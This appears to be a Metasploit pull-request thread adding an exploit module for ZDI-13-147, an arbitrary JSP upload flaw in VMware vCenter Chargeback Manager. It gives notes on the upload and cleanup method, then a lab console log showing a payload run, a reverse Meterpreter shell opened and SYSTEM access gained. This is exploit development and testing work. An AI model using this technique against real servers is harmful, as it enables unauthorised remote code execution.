Add module for ZDI-13-147

[jvazquez-r7]

Notes:

• A jar with a webapp to deploy can't be uploaded because there isn't dir traversal, just arbitrary file upload to a dir where JSP exec is allowed.
• In order to clean the jsp custom code is needed. The FileDropper can't be used because the file is landed into a directory dynamically created with the tomcat instance. So you must search for it.

Tested successfully on Windows 2003 SP2 / VMware vCenter Chargeback Manager 2.0.1:

• check

msf exploit(vmware_vcenter_chargeback_upload) > check
[*] The target service is running, but could not be validated.

• exploit

msf exploit(vmware_vcenter_chargeback_upload) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.161:443 - Uploading JSP to execute the payload
[*] 192.168.172.161:443 - Executing payload
[*] Sending stage (751104 bytes) to 192.168.172.161
[*] Meterpreter session 5 opened (192.168.172.1:4444 -> 192.168.172.161:2289) at 2013-07-18 15:38:54 -0500
[*] 192.168.172.161:443 - Searching: NcZyERev.jsp
[!] Deleting: c:\\Program Files\VMware\VMware vCenter Chargeback\apache-tomcat\webapps\cbmui\images\NcZyERev.jsp
[+] 192.168.172.161:443 - NcZyERev.jsp deleted
[!] This exploit may require manual cleanup of: ZoMUTwRw.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[wchen-r7]

This can go to DefaultOptions, no?

[jvazquez-r7]

I guess. Does it hurts to use the builtin methods to set it?

Just asking, maybe there is something which isn't fine with it and I'm not aware about it.

[wchen-r7]

No, I don't think it hurts.